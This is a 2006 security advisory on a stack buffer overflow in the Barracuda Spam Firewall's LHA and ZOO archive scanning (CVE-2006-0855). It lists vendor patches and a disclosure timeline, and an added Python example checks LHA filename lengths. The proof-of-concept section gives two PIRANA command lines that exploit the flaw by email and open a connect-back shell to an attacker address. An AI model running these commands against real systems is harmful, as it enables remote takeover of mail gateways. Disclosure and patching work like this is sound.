Credit:
The information has been provided by Jean-Sebastien Guay-Leroux.
Vulnerable Systems:
* Barracuda Spam Firewall with firmware versions prior to 3.3.03.022
* Barracuda Spam Firewall with spamdef version prior to 3.0.10045
A specially crafted LHA or ZOO archive containing long filenames can overflow a buffer on the stack used by the program, allowing an attacker to seize control of the program. Since this component is used when scanning incoming email, remote compromise is possible by sending the Barracuda Spam Firewall a simple email with the specially crafted archive attached. No administration access (on port 8000) is needed for successful exploitation.
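As a defensive illustration of the point above, the following added example (not part of the original advisory and not Barracuda's code) reads the path-field lengths declared in an LHA member header before the archive is handed to a decoder, and fails closed on inconsistent headers. It assumes the publicly documented level-0/1 LHA header layout; the 128-byte limit, the function names and the sample header are assumptions made for the example, and ZOO archives are not covered.

```python
import struct

MAX_NAME = 128  # assumed policy limit; the advisory does not give the buffer size

def lha_path_lengths(buf):
    """Path-field lengths declared by the first member header (level 0/1).
    Returns None when buf is not a level-0/1 LHA header."""
    if len(buf) < 22 or buf[2:3] != b"-" or buf[6:7] != b"-" or buf[20] > 1:
        return None
    base_end = buf[0] + 2              # size and checksum bytes are not counted
    name_len = buf[21]
    if base_end > len(buf) or 22 + name_len + 2 > base_end:
        raise ValueError("header shorter than the fields it declares")
    if sum(buf[2:base_end]) & 0xFF != buf[1]:
        raise ValueError("header checksum mismatch")
    lengths = [name_len]
    if buf[20] == 1:
        # Level 1: the last two bytes of each header give the size of the
        # next extended header; 0 ends the chain.
        pos = base_end
        (size,) = struct.unpack_from("<H", buf, pos - 2)
        while size:
            if size < 3 or pos + size > len(buf):
                raise ValueError("extended header runs past the data")
            if buf[pos] in (0x01, 0x02):   # 0x01 file name, 0x02 directory
                lengths.append(size - 3)
            pos += size
            (size,) = struct.unpack_from("<H", buf, pos - 2)
    return lengths

def verdict(buf, max_name=MAX_NAME):
    try:
        lengths = lha_path_lengths(buf)
    except ValueError:
        return "reject"                # fail closed on inconsistent headers
    if lengths is None:
        return "skip"                  # not a level-0/1 LHA header
    return "reject" if max(lengths) > max_name else "pass"

def sample_header(name, directory=b""):
    """Constructed level-1 header for the demo (no file data follows)."""
    ext = b"\x02" + directory + b"\x00\x00" if directory else b""
    body = (b"-lh0-" + struct.pack("<IIIBB", len(ext), 0, 0, 0x20, 1)
            + bytes([len(name)]) + name + b"\x00\x00" + b"U"
            + struct.pack("<H", len(ext)))
    return bytes([len(body), sum(body) & 0xFF]) + body + ext
```

A check like this belongs in front of the archive decoder as defence in depth; it does not replace the firmware update listed under Vendor Status.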
Proof of concept:
Using the PIRANA framework, available at http://www.guay-leroux.com, it is possible to test the Barracuda Spam Firewall against the LHA or ZOO vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:
LHA:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
    -p 1234 -z -c 1 -d 1
ZOO:
perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
    -p 1234 -z -c 1 -d 1
Vendor Status:
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388, available March 3rd 2006.
They also published an official patch in firmware #3.3.03.022, available April 3rd 2006.
It is recommended to update to firmware #3.3.03.022.
CVE Information:
CVE-2006-0855
OSVDB References:
#5753, #5754, #23460
Disclosure Timeline:
* 2006-03-02 - Disclosure of vulnerability to Barracuda Networks
* 2006-03-02 - Acknowledgement of the problem
* 2006-03-03 - ZOO Problem fixed
* 2006-03-24 - LHA Problem fixed
* 2006-04-03 - Advisory disclosed to public